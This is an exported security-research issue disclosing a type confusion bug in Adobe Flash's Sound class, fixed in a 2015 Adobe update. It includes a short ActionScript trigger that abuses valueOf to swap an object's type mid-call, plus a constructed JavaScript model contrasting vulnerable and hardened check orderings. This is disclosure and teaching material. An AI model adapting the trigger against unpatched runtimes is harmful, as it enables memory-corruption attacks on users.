magicislab / google-security-research

Automatically exported from code.google.com/p/google-security-research

Adobe Flash: Type Confusion in Sound class #262

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There is a type confusion issue in the Sound class (for all methods). The this 
object's type is checked, but then valueOf in another parameter in the method 
is called, and can change the type of the object before the pointer is actually 
cast to a native sound object.

The code for this issue does not compile, so the POC was created by compiling 
similar code and altering the SWF. But conceptually, the code for the issue is 
as follows:

    function mysubclass(a){
        super();
        var s = super;

        // valueOf of the argument: runs while the native method is still
        // executing, after the check on `this` but before the native cast
        function func(){
            trace(s);
            super(0);
            return 10;
        }

        var n = {test: "hello"};
        n.valueOf = func;
        var f = this.loadSound;
        this.__proto__ = {};
        this.__proto__.__constructor__ = Date;
        f.call(this, n, n);
    }

A PoC swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 13 Feb 2015 at 1:29

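The ordering problem the report describes (type of `this` checked, then an argument coerced, which runs script that can change the object, then the native pointer taken) is easy to model outside Flash. The following is an added illustration, not Adobe's or the reporter's code: the "native" backings, the `loadSoundVulnerable`/`loadSoundHardened` functions and the field names are all constructed for this example. JavaScript is used because its `valueOf` coercion hook behaves like the ActionScript one in the report.

```javascript
// Constructed model of a native method whose type check on `this` is done
// before an argument coercion that can run arbitrary script.

// Two "native" backings with different layouts. In a real player these are
// C++ objects behind a pointer; here the layout difference is just the fields.
const soundBacking = { kind: 'sound', sampleRate: 44100 };
const dateBacking  = { kind: 'date',  epochMs: 0 };

function isSound(thisObj) {
  return Boolean(thisObj.backing) && thisObj.backing.kind === 'sound';
}

// Vulnerable ordering: (1) check the type of `this`, (2) coerce the argument,
// which calls arg.valueOf() and so runs script, (3) fetch the backing and use
// it as if the check from step (1) still held.
function loadSoundVulnerable(thisObj, arg) {
  if (!isSound(thisObj)) throw new TypeError('not a Sound');
  const n = Number(arg);            // script runs here and may replace backing
  const backing = thisObj.backing;  // read after the script ran
  // Native code would now read Sound-layout fields from whatever is here.
  return { coerced: n, usedKind: backing.kind, sampleRate: backing.sampleRate };
}

// Hardened ordering: resolve every argument to a primitive first (all script
// runs now), then check the type once and take the backing immediately, with
// nothing that can run script between the check and the use.
function loadSoundHardened(thisObj, arg) {
  const n = Number(arg);
  if (!isSound(thisObj)) throw new TypeError('not a Sound');
  const backing = thisObj.backing;
  return { coerced: n, usedKind: backing.kind, sampleRate: backing.sampleRate };
}

// An argument whose valueOf swaps the backing of the target object while the
// method is in progress, standing in for the report's `n.valueOf = func`.
function makeSwappingArg(target) {
  return { valueOf() { target.backing = dateBacking; return 10; } };
}

// With the vulnerable ordering the method proceeds on a Date-layout backing:
// usedKind is 'date' and sampleRate is undefined (a wild read in native code).
function runVulnerable() {
  const sound = { backing: soundBacking };
  return loadSoundVulnerable(sound, makeSwappingArg(sound));
}

// With the hardened ordering the swap happens before the check, so the call is
// rejected with a TypeError instead of operating on the wrong backing.
function runHardened() {
  const sound = { backing: soundBacking };
  try {
    loadSoundHardened(sound, makeSwappingArg(sound));
    return 'proceeded';
  } catch (e) {
    return e instanceof TypeError ? 'rejected' : 'unexpected';
  }
}
```

The general rule the hardened version follows is that any argument conversion that can re-enter script must happen before the native object is validated and its pointer taken, or the validation must be repeated afterwards; when auditing native bindings, look for a type check on `this` that is separated from the eventual cast by a `valueOf`/`toString` style coercion of a caller-supplied value.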

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 13 Feb 2015 at 1:30

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 13 Feb 2015 at 5:09

GoogleCodeExporter commented 9 years ago
Possibly fixed by 
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html ? Mailing 
Adobe to check.

Original comment by cev...@google.com on 26 Mar 2015 at 8:23

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 10 Apr 2015 at 9:36

GoogleCodeExporter commented 9 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

Original comment by cev...@google.com on 14 Apr 2015 at 6:22

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 24 Apr 2015 at 8:36